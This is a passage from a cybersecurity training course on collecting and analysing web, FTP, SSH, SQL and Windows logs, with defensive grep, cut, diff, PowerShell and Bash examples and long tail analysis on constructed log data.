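    """Parse a log; return (entries, status-class counts, clients to review)."""
    entries = [parse_clf(ln) for ln in log_text.splitlines() if ln.strip()]
    classes = Counter(status_class(e['status']) for e in entries)
    return entries, dict(classes), repeated_forbidden(entries, threshold)


# Constructed sample: one normal page load, three 403s from one client,
# and a 502 on an authenticated POST with no response size available
SAMPLE_LOG = """\
10.39.5.20 - - [12/Mar/2020:13:55:36 -0500] "GET /index.html HTTP/1.1" 200 2326
10.39.5.77 - - [12/Mar/2020:13:55:40 -0500] "GET /admin/ HTTP/1.1" 403 199
10.39.5.77 - - [12/Mar/2020:13:55:41 -0500] "GET /admin/config HTTP/1.1" 403 199
10.39.5.77 - - [12/Mar/2020:13:55:43 -0500] "GET /admin/users HTTP/1.1" 403 199
10.39.5.20 - alice [12/Mar/2020:13:56:02 -0500] "POST /api/orders HTTP/1.1" 502 -
"""

if __name__ == '__main__':
    entries, classes, suspects = summarize(SAMPLE_LOG)
    print(classes)   # {'success/redirect': 1, 'client error': 3, 'server error': 1}
    print(suspects)  # {'10.39.5.77': 3}
```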

HTTP Headers
In addition to status codes, some web server software also logs HTTP header information for both requests and responses. This can provide you with a better picture of the makeup of each request or response, such as cookie information and MIME types. Another header field of note is the User-Agent field, which identifies the type of application making the request. In most cases, this is the version of the browser the client is using to access a site, as well as the client's operating system. However, the User-Agent field is not always a reliable indicator of the client's environment.

SSL/TLS Debugging
In some cases, SSL/TLS connections may not be working as intended. The relevant debugging information is typically not included in standard HTTP web logs, but in separate SSL/TLS logs, assuming they are enabled on the server. However, these logs may either be too verbose or not provide enough information. For example, an SSL/TLS log may record a failed handshake, but be unable to clearly indicate why the handshake failed. In these cases, it may be more beneficial to use a packet analyzer like Wireshark to capture and read SSL/TLS traffic in a human-readable format. Wireshark enables you to decrypt the captured traffic if you provide the corresponding cryptographic keys.

FTP Logs
File Transfer Protocol (FTP) servers log information differently based on the software they run, but many conform to the fields set by the World Wide Web Consortium (W3C). These fields identify the client and server in each transaction, as well as provide additional details about the transaction itself. Other than the standard date, time, and client/server IP address fields, the following W3C fields are also available and relevant for security intelligence purposes:
• cs-username: The user name the client used to authenticate to the server.
• cs-method: The method or action taken by the client or server (e.g., ControlChannelOpened).
• cs-status: The protocol status code. FTP has its own set of status codes.
• sc-bytes: The number of bytes sent by the server.
• cs-bytes: The number of bytes received by the server.
• x-session: The unique ID assigned to the session.
• x-fullpath: The relative path from the FTP root directory to any directory specified in the action.
• x-debug: Additional information about the protocol status code (e.g., code 530 may produce "User not signed in").


Figure 7-15: An FTP log.


Note: For a full list of FTP status codes, navigate to https://en.wikipedia.org/wiki/List_of_FTP_server_return_codes.

SSH Logs

Secure Shell (SSH) logs are not necessarily as standardized as HTTP or FTP logs. Nevertheless, most SSH server software comes with at least some logging functionality that records basic client/server session information. Each event in an SSH log usually concerns session establishment and termination rather than the actual details of a connection. After all, SSH is an encrypted protocol meant to protect remote shell sessions from eavesdropping. So, logs often include:
• The date and time that each event took place on the server.
• The user name the client is using to connect.
• The client's IP address and return port.
• The client's SSH software.
• Whether the connection succeeded or failed.
• The cryptographic protocol used to secure the session.

Figure 7-16: An SSH log.

SQL Logs

Databases that run on Structured Query Language (SQL) log daily server operations and user interaction with the servers. Like a system event log, SQL servers record events with fields like date, time, and the action taken. Normal actions can include server startup, individual database startup, database cache clearing, and more. SQL logs also record error events, like databases failing to start or shutting down unexpectedly.

SQL servers also record user interactions that can potentially be useful as security intelligence. Administrators typically access SQL servers through built-in remote management consoles, and each connection attempt, success, and failure is logged. Like any other system access log, you can use these entries to determine whose account has been used to exfiltrate or tamper with data.
From a standard user perspective, SQL servers can also log individual query strings sent to the databases. Other than the date, time, and user who sent the query, these logs also record:
• The query operation performed.
• The schema associated with the operation.
• The object of the query.
Retrieving information on individual queries can provide you with actionable intelligence in the face of an SQL injection attack or unauthorized modification of a database using hijacked credentials. Logging all queries can significantly increase overhead, however, so log tuning is a must in this case.

Figure 7-17: An SQL server log.


ACTIVITY 7-3
Collecting Host-Based Security Intelligence

Before You Begin

You'll be using Log Parser and Log Parser Studio, tools developed by Microsoft that enable you to run queries on data. Both have already been installed on your server.

Scenario

You are not satisfied with looking through log files entry by entry, so you decide to try Microsoft's Log Parser Studio to automate queries to your host-based log files. You could manually do all of these queries on your own, but a tool like this puts them all in one place. This is not as good as a SIEM, but it will do until you get one.

1. Export your Windows Server logs.
a) On your server, from Server Manager, select Tools→Event Viewer.
b) In the center pane, observe how many events of various types are listed.
c) Note the number of errors your server has logged in the past 24 hours.
This depends on the server's activity.
d) In the console tree, expand Custom Views.
e) Select Administrative Events.


f) In the Actions pane on the right, select the Save All Events in Custom View As link.
g) Name the file ServerEvents and save it on the desktop.
h) In the Display Information dialog box, verify the No display information radio button is selected.
i) Select OK.
j) Close Event Viewer.

2. Use Log Parser and Log Parser Studio to run queries on your saved log file.
a) On the desktop, open the LPSV2.D1 folder.
b) Right-click the LPS.exe icon and select Run as administrator to start Log Parser Studio.
c) Scroll through the possible database queries.
d) Select the yellow folder icon Choose log files/folders to query.
e) In the Log File Manager window, select Add Files.
f) Navigate to the ServerEvents.evtx file and open it.
g) Select OK to close the Log File Manager.

3. Search for application error and remote logon events.
a) At the top of the screen, in the Search box, type event and press Enter.


b) Double-click EVENTS: Count Application Errors per Hour.
c) In the new tab, select the red ! button to run the query.
d) Right-click the Q1 tab and select Rename Tab.
e) Name the tab AppErrors and press Enter.
f) Select the Library tab.
g) Double-click EVENTS: Find all Remote Logons.
h) Select the red ! button to run the script.
i) Rename the tab RemoteLogon.

Note: It may take a few moments for the script to finish running.

4. Looking at the remote logon event list, can you tell what caused these events?
A: Several of these remote logon events were created when you remotely accessed the server using the Metasploit PsExec exploit during the penetration test activity.

Instructor note: If students need a hint, remind them of using the Metasploit tool from earlier.

Instructor note: Time permitting, have students run additional queries on the log file.

5. What is the value of this tool beyond using Event Viewer alone?
A: Answers will vary. Log Parser can combine multiple logs, even from different devices. It also automates many of the queries you would otherwise have to do by hand.

6. Close Log Parser Studio.


Summary
In this lesson, you collected cybersecurity intelligence that can be used in later analysis efforts. You
prepared by deploying a collection strategy, and then you collected data from a wide range of
sources, including network-based and host-based logs. Understanding the purpose, characteristics,
and formatting of these intelligence sources is essential to gathering exactly what information you
need to detect and mitigate incidents.

Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

What types of retention policies is the data in your organization or an organization you're familiar with subject to? How does this affect collection efforts?
A: Answers will vary. Students working in particular sectors or industries, such as healthcare, will need to comply with applicable laws and regulations that define exactly how long to retain data like PII. Even without legal pressure, organizations will also likely adopt their own retention policies based on industry best practices, while also considering the sensitivity of each type of data. Either way, students may find that this reduces the amount of actionable intelligence they collect or store, while others may be unaffected as they don't get much use out of years-old data.

How does your organization or an organization you're familiar with tune logs to optimize the amount of useful intelligence they provide?
A: Answers will vary. Potential log tuning tasks include: automatically configuring logs to roll over to new files after reaching a certain size or after a certain period of time; logging only a certain amount of events over a period of time; eliminating extraneous fields from logs, such as a destination field that is always the same for every event; implementing standardized log formats to make it easier to correlate logs from different appliances; and more.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates, peers, and the larger CHOICE online community about the topics covered in this course or other topics you are interested in. From the Course screen you can also access available resources for a more continuous learning experience.



8 Analyzing Log Data

Lesson Time: 2 hours

Lesson Introduction

Now that you've collected security intelligence from a wide variety of log-based sources, you can begin to dissect those logs to reveal key information about potential threats and vulnerabilities. Log analysis is a powerful process that can turn your security intelligence into actionable data.

Lesson Objectives

In this lesson, you will:

• Analyze a wide array of log data by using common Windows- and Linux-based security tools.
• Incorporate a SIEM system into the analysis process.


TOPIC A
Use Common Tools to Analyze Logs
Analysis efforts can be strained if they're done manually, but plenty of tools are out there to make
your job easier. These tools can automate the analysis process and reveal useful information that you
may not have seen otherwise.

Preparation for Analysis

As you attempt to transform raw data into actionable intelligence, at some point between data collection and data analysis, you'll need to prepare your raw data to get it into a form that is useful and efficient for analysis. To some extent, this may be done for you by your automation tools. You may also have to manually prepare some data using capabilities provided by your logging and tracing tools.

A variety of skills can help you in the process of preparing data. Programming, shell scripting, or batch file writing skills enable you to develop automation tools. The ability to write regular expressions can help you search for patterns. Even tools like a word processing or spreadsheet program may be useful in this process. Of course, the ability to use tools such as security information and event management (SIEM) and log analysis tools is also helpful.

Guidelines for Preparing Data for Analysis

Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the CHOICE Course screen.

Follow these guidelines as you prepare data for analysis.

Prepare Data for Analysis

To prepare data for analysis, perform the following tasks. Note that these tasks may be performed automatically for you by tools such as SIEMs.

• Filter out unnecessary or duplicate data: Some data may not be applicable to your analysis and will slow down your processing.
• Combine sources: Different logs record different information, which may provide significant insights into an attack when the logs are combined.
• Synchronize events logged in different sources: The internal clock setting may vary significantly from one device to another, including different time zones. To be able to investigate how a situation unfolded, you need to be able to effectively view events in a timeline sequence.
• Normalize data formats: Different formats may be used for data, such as dates and times, and information may be combined or presented differently in different log sources. Analysis is easier when data is presented consistently.
• Store data securely: Once you have prepared the data for analysis, you'll need to ensure that it is stored securely. Destroy any temporary files you may have created in the process. Separate from any analysis or investigation you are conducting, your standard operating procedures should ensure that the original logs are stored securely in support of applicable laws and compliance regulations.
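As an added example that is not part of the course material, the following Bash script carries out the filter, combine, synchronize and normalize tasks above on two constructed log excerpts: a syslog from a host whose clock runs at UTC+02:00 and a Windows Firewall log already in UTC. It assumes GNU date, as found on Linux; all log lines and host names are constructed.

```shell
#!/bin/bash
# Added example (not from the course): prepare two constructed log sources for
# analysis by filtering noise, normalizing timestamps to UTC, merging both into
# one timeline and dropping duplicate lines. Assumes GNU date (Linux).

# Constructed syslog excerpt from a host whose clock runs at UTC+02:00. The
# syslog timestamp carries no year, so the year has to be supplied separately.
LINUX_LOG='Mar 13 09:05:01 kali CRON[1201]: (root) CMD (run-parts /etc/cron.hourly)
Mar 13 09:05:07 kali sshd[1234]: Failed password for root from 10.39.5.10 port 51234 ssh2
Mar 13 09:05:07 kali sshd[1234]: Failed password for root from 10.39.5.10 port 51234 ssh2
Mar 13 09:06:30 kali sshd[1240]: Accepted password for root from 10.39.5.10 port 51240 ssh2'

# Constructed Windows Firewall (pfirewall.log style) excerpt, already in UTC:
# date time action protocol src-ip dst-ip src-port dst-port ... path
FW_LOG='2024-03-13 07:05:05 ALLOW TCP 10.39.5.10 10.39.5.20 51234 22 - - - - - - - RECEIVE
2024-03-13 07:06:28 ALLOW TCP 10.39.5.10 10.39.5.20 51240 22 - - - - - - - RECEIVE'

# Normalize "Mon DD HH:MM:SS host rest" lines (local time at the given UTC
# offset) into "YYYY-MM-DDTHH:MM:SSZ linux host rest". $1 = year, $2 = offset.
normalize_syslog() {
    local year="$1" offset="$2"
    while read -r mon day time host rest; do
        [ -n "$mon" ] || continue
        local utc
        # "13 Mar 2024 09:05:07 +0200" is a date format GNU date understands.
        utc=$(date -u -d "$day $mon $year $time $offset" +%Y-%m-%dT%H:%M:%SZ)
        printf '%s linux %s %s\n' "$utc" "$host" "$rest"
    done
}

# Normalize "YYYY-MM-DD HH:MM:SS rest" lines (already UTC) into the same shape.
normalize_firewall() {
    while read -r d t rest; do
        [ -n "$d" ] || continue
        printf '%sT%sZ firewall %s\n' "$d" "$t" "$rest"
    done
}

# Build the merged timeline: drop cron noise (filter), convert both sources to
# one timestamp format (normalize/synchronize), then sort -u to order the
# events in time and remove the duplicated sshd line (combine/deduplicate).
merged_timeline() {
    {
        printf '%s\n' "$LINUX_LOG" | grep -v 'CRON\[' | normalize_syslog 2024 +0200
        printf '%s\n' "$FW_LOG" | normalize_firewall
    } | sort -u
}

merged_timeline
```

The merged output interleaves the firewall's ALLOW entries with the sshd entries they correspond to, which is only possible once both clocks are expressed in the same zone.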

Log Analysis Tools

There are a wide variety of log analysis tools available, and many of them provide just one or two particular functions. These types of tools are meant to be used in combination with other such tools to form a comprehensive suite of log analysis software. In other words, there's not necessarily one monolithic tool that will enable you to do anything you could possibly need when it comes to analyzing logs.

Lesson 8: Analyzing Log Data | Topic A

In this topic, log analysis tools are divided into the following categories:
• Linux® tools:
  • grep
  • cut
  • diff
• Windows® tools:
  • findstr
  • Windows Management Instrumentation Command-line (WMIC)
  • Event Viewer
• Scripting languages:
  • Bash (Linux)
  • Windows PowerShell™

The grep Command

In Unix-like operating systems, the grep command searches text files for specific strings supplied by the user. This enables you to search the entire contents of a text file for a specific pattern, and display that pattern on the screen or dump it to another file. This is an extremely powerful and useful ability for both administrators and end users alike, and grep has therefore become one of the most popular tools in Linux computing.

A simple example of grep in action is as follows:

grep 10.39.5.10 iplog.txt

This searches the text file iplog.txt for all lines containing some variation of the text "10.39.5.10" and prints those lines to the terminal. (The variation arises because grep reads the search string as a regular expression, in which an unescaped dot matches any single character; to match the address literally, quote it and escape the dots, or use the -F option.)

The grep command is essential in analyzing Linux logs because it gives you the ability to pinpoint the exact information you're looking for, regardless of how large and unwieldy the entire log file appears to be. Some log analysis–related use cases for grep include:

• Searching for specific facility codes, like authorization messages.
• Searching for specific process IDs.
• Searching for specific details of an event, like applications or servers starting up.
• Searching for specific IP addresses or domains to determine the source or destination of traffic.
• Searching for specific dates and times during which an event may have occurred.
• Searching multiple log files in one search operation.

Figure 8-1: Searching the Linux syslog for entries with the NetworkManager process.


Options

Other than its default behavior, grep provides the following options.

Option  Description

-i  By default, search strings in grep are case sensitive. This option ignores case sensitivity.
-v  Reverses the grep command's default behavior, returning only lines that do not match the given string.
-w  Treats search strings as discrete words. By default, the string "add" will also return "address". With this option, the string "add" will only return instances of the word "add" by itself.
-c  Returns the total count of matching lines rather than the lines themselves.
-l  Returns the names of the files with matching lines rather than the lines themselves. Primarily used in multi-file grep searches.
-L  Similar to the behavior of the -v option, in that it returns the names of files without matching lines.
-r  Searches recursively within the given directory. This is useful when the files you're searching are in different subdirectories.

The cut Command

Using grep is great for finding lines with the information you're looking for. But what if you want to trim these results to only return certain information from each line? For instance, you might be interested in only the time and date an event occurs—not its detailed event information or anything else that might end up being too much visual "noise." This is where the cut command comes in handy. The cut command enables you to specify which portion of each line you want to keep, removing everything else from your results so they're easier for you to read. This can eliminate the frustration and inefficiency of poring over logs with excessive information on each line.

Many cut operations use the -c option, which enables you to specify which characters to keep. Here's a basic example:

cut -c5 syslog

This will return only the fifth character in each line of the syslog file. You can also specify multiple characters or a range of characters by using -c#,# and -c#-#, respectively.

The other major use of cut is with the -f and -d flags. Take the following example:

cut -d " " -f1-6 syslog

The -d flag specifies a delimiter, or a character that acts as a separator. In this case, the delimiter is a space. The -f flag is similar to the -c flag, but instead of selecting by characters, it selects fields, the groups of characters separated by the delimiter you specified. So, the aforementioned example will return the first six groups of characters separated by a space.


Figure 8-2: Using a delimiter to cut the syslog so that it shows only the date, time, source, and process related to an event.

Note: The Kali Linux syslog that this example was taken from separates the month and the day by two spaces. In other Linux distributions, you may only need to cut the first five groups to get the same results.

The diff Command

The diff command takes two text files and returns how those files differ. It does this line by line, similar to how grep and cut work with individual lines. The actual output of diff displays each line that is not the same, along with a summary of where those lines are and how they need to be changed to make the first file identical to the second file.

The logs in these examples have been truncated for clarity.

In the following example, syslog has the following three lines:
1. Feb 11 localhost
2. Mar 13 localhost
3. Mar 13 server00
And syslog.1 has the following three lines:
1. Feb 11 localhost
2. Feb 11 localhost
3. Mar 13 localhost
Using diff syslog syslog.1 will return the following:

1a2
> Feb 11 localhost
3d3
< Mar 13 server00

The 1a2 code means that after line 1 in the first file, line 2 from the second file needs to be added. Feb 11 localhost is the line in question. The 3d3 code means that you need to delete line 3 in the first file so that line 3 matches up in both files. Mar 13 server00 is the line in question.


Figure 8-3: The previous example in action.

Note: You can also output the results side by side in two columns using the -y flag.

The diff command is useful for log analysis when you need to correlate actions across multiple log files in different systems. You can use time values with diff to pinpoint when an event happens, and to see if other logs recorded that same event around the same time. You can also use diff to ensure that logs haven't been tampered with by comparing one log with a backup.
Consider informing students that, in some cases, the order in which you pipe commands matters.

Piping

Linux commands like grep, cut, and diff are further beneficial to security analysts because they can be combined into a single command—a process called piping. Piping uses the pipe character (|) to separate commands. For example, to return only lines in syslog that deal with the NetworkManager process, while also cutting each line so that only the date, time, source, and process display, you would enter:

grep "NetworkManager" /var/log/syslog | cut -d " " -f1-6

Figure 8-4: In this example, the grep command feeds into the cut command, producing a more focused output.

The findstr Command

The findstr command is essentially the Windows version of grep. It searches text files for a particular string that you provide, and returns the lines that contain this string. The findstr command has a slightly different syntax than grep, but it includes most of the same basic options. For example, you can use the /i option to specify case insensitivity.
The following is an example of the findstr command:

findstr /i "ICMP" C:\Windows\system32\LogFiles\Firewall\pfirewall.log

This searches a Windows Firewall log for instances of Internet Control Message Protocol (ICMP) packet entries.

Figure 8-5: The previous example in action. The results show four different entries of ICMP packets being allowed through the firewall.

The find Command

On Windows, the find command is an older version of the findstr command. They are very similar, but one major difference is that find does not support regular expressions. Also, find is not compatible with Windows PowerShell and must be run from the traditional Windows command prompt (cmd.exe).

Note: The Windows find command should not be confused with the Linux find command, which is used to locate files in a directory.

WMIC for Log Analysis

Despite its use by attackers, Windows Management Instrumentation Command-line (WMIC) can also be helpful to security analysts who need to review log files on a remote Windows machine. The main alias you can use in WMIC to review logs is NTEVENT. NTEVENT will, given a certain input, return log entries that match your parameters.

For example:

wmic NTEVENT WHERE "LogFile='Security' AND EventType=5" GET SourceName,TimeGenerated,Message

This will look in all Security event log entries whose events are type 5 (audit failure). It will then return the source, the time the event was generated, and a brief message about the event. This can be useful for identifying specific events based on their details, without actually being at the target computer and combing through Event Viewer.


Figure 8-6: The previous example in action.

Event Viewer

Event Viewer is the main graphical hub for viewing event logs on a Windows computer. As you've seen, Windows logs events in one of several different categories, and Event Viewer provides views for each category. Several of these event categories further classify events by their severity:
• Information: Successful events.
• Warning: Events that are not necessarily a problem, but may be in the future.
• Error: Events that are significant problems and may result in reduced functionality.
• Audit Success/Failure: Events that indicate a user or service either fulfilled or failed to fulfill the system's audit policies. These are unique to the Security log.
Beyond general category and severity, Event Viewer displays detailed information for each log entry, including the subject of the entry; details of the error (if there is one); the event's ID; the source of the event; a description of what a warning or error might mean; and more.
The real power of Event Viewer is that it gives you several easy-to-use options for managing your logs. You can filter logs by many different characteristics, like date and time, severity, event ID, source, and much more. Filtering is crucial in helping you avoid the clutter of thousands of events that get logged. Additionally, you can also create custom views within Event Viewer so it's easier to monitor only the events you care about. You can also adjust log properties, like the maximum size of each log, and you can create backups of logs in case of data loss. You can also clear logs manually when you no longer need them.


Figure 8-7: Log entries in Event Viewer.

Bash

A deeper dive into programming fundamentals is beyond the scope of this course.

Bash is a scripting language and command shell for Unix-like systems. It is the default shell for most Linux distributions, and has its own command syntax. Tools like grep, cut, and diff are built into the Bash shell.

Beyond individual command entry, Bash is also powerful in that it can run complex scripts. Similar to standard programming languages, Bash supports elements like variables, loops, conditional statements, functions, and more. Bash scripting can aid the log analysis process by automating various commands—the analyst can write the script and execute it all at once, and they can use this same script over and over at different points in time. Because time is such a precious resource for any cybersecurity professional, creating custom scripts for an environment is a great way to optimize daily log analysis tasks.
The following is an example of a simple Bash script named nm-script that uses some of the commands already discussed:

#!/bin/bash
echo "Pulling NetMan entries..."
grep "NetworkManager" /var/log/syslog | cut -d " " -f1-6 > netman-log.txt
echo "NetMan log file created!"

The first line of the script indicates what type of interpreter the system should run, as there are many different scripting languages. The echo lines simply print messages to the console. The grep line pipes into cut to trim the syslog as before, and outputs the results to a file called netman-log.txt.

Note: In order to run a script in Linux, that script file must have the execute bit (x) set on it.
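Building on the nm-script above, the following is an added example (not the course's own script) that puts grep, cut, piping and diff to work together in one Bash script, covering the grep, cut, diff and piping sections of this topic. Both the "live" syslog excerpt and its backup copy are constructed inline; the tampering check reports lines that exist in the backup but have disappeared from the live log.

```shell
#!/bin/bash
# Added example (not the course's nm-script): grep, cut, piping and diff in one
# Bash script. Both logs are constructed inline so the script runs offline.

# Constructed backup of the syslog, taken before any tampering. Month and day
# are separated by two spaces, as in the Kali syslog the course describes, so
# the date, time, host and process occupy fields 1-6 with a space delimiter.
BACKUP_LOG='Mar  13 09:05:01 kali NetworkManager[600]: <info> device (eth0): state change: ip-config -> activated
Mar  13 09:05:02 kali CRON[1201]: (root) CMD (run-parts /etc/cron.hourly)
Mar  13 09:05:07 kali sshd[1234]: Failed password for root from 10.39.5.10 port 51234 ssh2
Mar  13 09:06:30 kali sshd[1240]: Accepted password for root from 10.39.5.10 port 51240 ssh2
Mar  13 09:07:11 kali NetworkManager[600]: <warn> dhcp4 (eth0): request timed out'

# Constructed live syslog: identical, except that the "Accepted password" line
# has been removed (simulated tampering).
LIVE_LOG='Mar  13 09:05:01 kali NetworkManager[600]: <info> device (eth0): state change: ip-config -> activated
Mar  13 09:05:02 kali CRON[1201]: (root) CMD (run-parts /etc/cron.hourly)
Mar  13 09:05:07 kali sshd[1234]: Failed password for root from 10.39.5.10 port 51234 ssh2
Mar  13 09:07:11 kali NetworkManager[600]: <warn> dhcp4 (eth0): request timed out'

# nm-script logic: keep NetworkManager lines and trim each to fields 1-6
# (date, time, host, process). $1 = log text.
netman_entries() {
    printf '%s\n' "$1" | grep "NetworkManager" | cut -d " " -f1-6
}

# grep -i and -c together: count failed logons regardless of case. $1 = log text.
failed_logon_count() {
    printf '%s\n' "$1" | grep -i -c "failed password"
}

# diff the live log against its backup. Lines that only the backup has are
# marked ">" by diff; cut -c3- strips that marker. $1 = live, $2 = backup.
removed_since_backup() {
    live=$(mktemp) || return 1
    backup=$(mktemp) || return 1
    printf '%s\n' "$1" > "$live"
    printf '%s\n' "$2" > "$backup"
    diff "$live" "$backup" | grep '^>' | cut -c3-
    rm -f "$live" "$backup"
}

echo "Pulling NetMan entries..."
netman_entries "$LIVE_LOG"
echo "Failed logons: $(failed_logon_count "$LIVE_LOG")"
echo "Lines present in the backup but missing from the live log:"
removed_since_backup "$LIVE_LOG" "$BACKUP_LOG"
```

The comparison is only as trustworthy as the backup, so the copy you diff against should come from storage the compared host cannot write to.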


Figure 8-8: The previous script runs and the output is displayed.
Note: For a more in-depth look at Bash scripting, visit www.tldp.org/LDP/abs/html/.

Note: Windows 10 includes a Linux subsystem that supports the Bash shell.


Z Shell

The Z shell, also called Zsh, is an updated version of the Bash shell. The Z shell has been the default shell of Kali Linux since version 2020.4, and the default shell of macOS since Catalina (2019), both of which previously defaulted to Bash. The syntax of the Z shell is essentially the same as Bash, so your scripts will work in both environments without modification.


Windows PowerShell

Windows PowerShell is a scripting language and shell for Microsoft® Windows that is built on the .NET Framework. Microsoft started packaging PowerShell with Windows with the release of Windows 7 and Windows Server® 2008 R2, and it is the default shell on Windows 10 and 11, as well as Windows Server 2019 and 2022. PowerShell is often used by administrators to manage both local and remote hosts as it integrates with Windows Management Instrumentation (WMI). PowerShell offers much greater functionality than the traditional Windows command prompt.
PowerShell functions mainly through the use of cmdlets, which are specialized .NET commands that interface with PowerShell. These cmdlets typically take the syntax of Verb-Noun, such as Set-Date to change a system's date and time. Like other command shells, the cmdlet will take whatever valid argument the user provides.
PowerShell is also able to execute scripts written to its language. Like Bash, the PowerShell scripting language supports a wide variety of object-oriented programming elements. These scripts provide the same benefit as before—the ability to automate log analysis tasks to cut down on the time it takes to constantly type out a command. Also, since there are so many cmdlets available to PowerShell, creating multiple custom scripts will help you avoid having to remember each cmdlet or constantly look them up.


Consider pointing out to students, if they haven't noticed, that PowerShell supports piping.

The following is an example of a PowerShell script named log-fail-script.ps1:

Write-Host "Retrieving logon failures..."
Get-EventLog -Newest 5 -LogName Security -InstanceId 4625 | Select TimeWritten, Message | Out-File C:\log-fail.txt
Write-Host "Log created!"

The Write-Host cmdlets function similarly to echo by printing the given text to the PowerShell window. The Get-EventLog cmdlet line searches the Security event log for the latest five entries that match an instance ID of 4625—the logon failure code. The time the event was logged and a brief descriptive message are then output to the log-fail.txt file.

Figure 8-9: The previous script runs and the output is displayed.

Additional Log Analysis Tools

The following table describes some additional tools that could round out your log analysis toolkit.

Tool  Description

awk  A tool commonly found on Unix-like systems, awk is a scripting engine geared toward modifying and extracting data from files or data streams, which can be useful in preparing data for analysis. Programs and scripts run in awk are written in the AWK programming language.
tail  Another tool included in Unix-like systems, tail outputs the last 10 lines of a file you provide. You can also adjust this default value to output more or fewer lines. Likewise, you can use the -f switch to view a real-time list of the last few lines as the file is updated. This tool is very useful for reviewing the most recent entries in a log file.
Simple Event Correlator (SEC)  SEC is a lightweight tool that runs as a single process that monitors a stream of events. It can detect and act on event patterns, producing output through external programs such as snmptrap or mail, writing out files, sending data to servers, calling pre-compiled Perl® scripts, and so forth.
Microsoft Log Parser  This command-line tool, targeted toward Windows logs and available as a free download from Microsoft, provides a querying capability for Microsoft log files and Registry entries, as well as XML, comma-separated values (CSV), and other common formats.
Logwatch  Logwatch is a customizable log analysis system available for free download. This utility parses system logs and creates a report on various aspects that you specify. Multiple configuration sources, including various configuration files and command-line arguments, help to support scripted automation. Logwatch has a plug-in interface that enables you to customize it to your needs.
Kiwi Syslog® Server  Kiwi Syslog Server is a Windows-based proprietary log management platform that collects Linux syslog and Windows event log data from a variety of different networking and host-based appliances. It can also generate alerts based on the log data it receives, and it can be configured to take action on these alerts. Kiwi Syslog Server is essentially a lightweight version of a SIEM that is best used in small and mid-size organizations.
Visualization tools  Visualization tools can help you identify patterns in your logging data much more easily than scanning columns of text and numbers. Charts (potentially with animation) make it easier to see trends and outliers, and anomalies over time. SIEMs or other log analysis tools often include integrated charting and visualization tools, or you can create your own charts from logging data using tools such as gnuplot, the Python Matplotlib library, the Google Charts application programming interface (API), Tableau, and Microsoft Excel®.
Big data analysis tools  Big data tools such as Google BigQuery and Apache™ Hadoop® can be useful platforms for developing your own analysis tools. Third-party cloud-based apps also provide log analysis services.


Long Tail Analysis

All the tools mentioned in this topic can help you shape logs and extract useful information from them. However, the usefulness of any tool is dependent on the user's aptitude. While you may have taken care to tune your logs to eliminate as much noise as possible, you'll never produce the perfect log. That's why, during the analysis phase, you'll need to do some additional manipulation to get your logs to report on the most valuable information possible, while suppressing irrelevant events. One powerful method for separating the signal from the noise is long tail analysis.
In its original context, the "long tail" is a property of statistical distributions in which a high population dominates initially, but then "tails off" into a low population. This has been applied to a retail business context in which a small set of unique items is sold in large quantities, compared to a large set of unique items sold in small quantities (the long tail). Its application in a security context has been simplified: long tail analysis is the process of culling low-frequency events to identify anomalies.

Long tail analysis starts from the assumption that one unique event in a sea of thousands is more likely to be relevant to a security analyst than a common event that has numerous entries. In other words, the more common an event is, the less useful it is—and the less common an event is, the more useful it is. This is not universally true, and there are some exceptions, but for the most part, a low-frequency event can indicate anomalous behavior that you'll want to examine.
Consider a simplified version of the previous example of the Get-EventLog command in PowerShell:

Get-EventLog -LogName Security -InstanceId 4625

This will retrieve all logon failure events in the log. In a log where thousands of people are logging on every single day, this could end up retrieving an overwhelming amount of data. Instead, you could take a step back and first identify what instance IDs are actually useful to you. To do that, you can sort the log by how many entries are logged for each instance ID:

Get-EventLog -LogName Security | Group-Object -Property InstanceId -NoElement | Sort-Object -Property Count

The truncated result might be something like the following:

Count Name
----- ----
    1 4740
    5 4698
    5 4699
   21 4661
  ...
 4302 4625
13801 4624
63906 4558

From this result, you might choose to focus on examining events 4740 (a user account was locked out), 4698 (a scheduled task was created), and 4699 (a scheduled task was deleted). These events are much less common and may indicate suspicious or unwanted behavior—more so than the general logon failure event (4625) would.
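The same long tail ranking, as an added example that is not from the course, done with a shell pipeline instead of Get-EventLog and Group-Object. The input is a constructed CSV export of a Security log (time, instance ID, message per line) in which the common and rare IDs are the ones discussed above; the counts and messages are constructed.

```shell
#!/bin/bash
# Added example (not from the course): long tail analysis as a shell pipeline.
# Input lines are "TimeGenerated,InstanceId,Message", the shape a CSV export of
# the Security log would have; the data here is constructed, with the common
# and rare event IDs the course discusses.

# Emit $1 constructed events with instance ID $2 and message $3.
emit_events() {
    n="$1"; id="$2"; msg="$3"; i=0
    while [ "$i" -lt "$n" ]; do
        printf '2024-03-13 07:%02d:00,%s,%s\n' "$((i % 60))" "$id" "$msg"
        i=$((i + 1))
    done
}

# The constructed log: 78 events, dominated by logons and logon failures.
sample_events() {
    emit_events 40 4624 "An account was successfully logged on"
    emit_events 25 4625 "An account failed to log on"
    emit_events 8 4661 "A handle to an object was requested"
    emit_events 2 4698 "A scheduled task was created"
    emit_events 2 4699 "A scheduled task was deleted"
    emit_events 1 4740 "A user account was locked out"
}

# Equivalent of Group-Object -Property InstanceId | Sort-Object Count: read
# events on stdin, count them per instance ID, least frequent first.
# Output is "count id" per line.
event_id_frequency() {
    cut -d, -f2 | sort | uniq -c | sort -n | awk '{ print $1, $2 }'
}

# The long tail itself: instance IDs seen at most $1 times (default 5).
long_tail_ids() {
    threshold="${1:-5}"
    event_id_frequency | awk -v t="$threshold" '$1 <= t { print $2 }'
}

# Pull the full records for the rare IDs only, suppressing the common events.
long_tail_events() {
    events=$(cat)
    for id in $(printf '%s\n' "$events" | long_tail_ids "$1"); do
        printf '%s\n' "$events" | grep ",$id,"
    done
}

echo "Count per instance ID (least frequent first):"
sample_events | event_id_frequency
echo
echo "Events in the long tail (seen 5 times or fewer):"
sample_events | long_tail_events 5
```

The threshold is a judgment call for the environment: set it too high and the 4625 noise comes back, set it too low and a rare ID that happens to fire twice is missed.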
lic

Guidelines for Using Linux- and Windows-Based Tools for Log Analysis

Use the following guidelines when analyzing logs on Linux and Windows systems.

Use Linux-Based Log Analysis Tools

Follow these guidelines when analyzing logs on a Linux system or analyzing logs from a Linux system:
• Ensure that you know the format of common Linux logs, like the syslog.
• Use grep when you need to search for specific strings in a log file, like a particular source or event ID.
• Consider the different options available for grep, like ignoring case sensitivity and searching for discrete words.
• Use the cut command to manage the length of your logs.
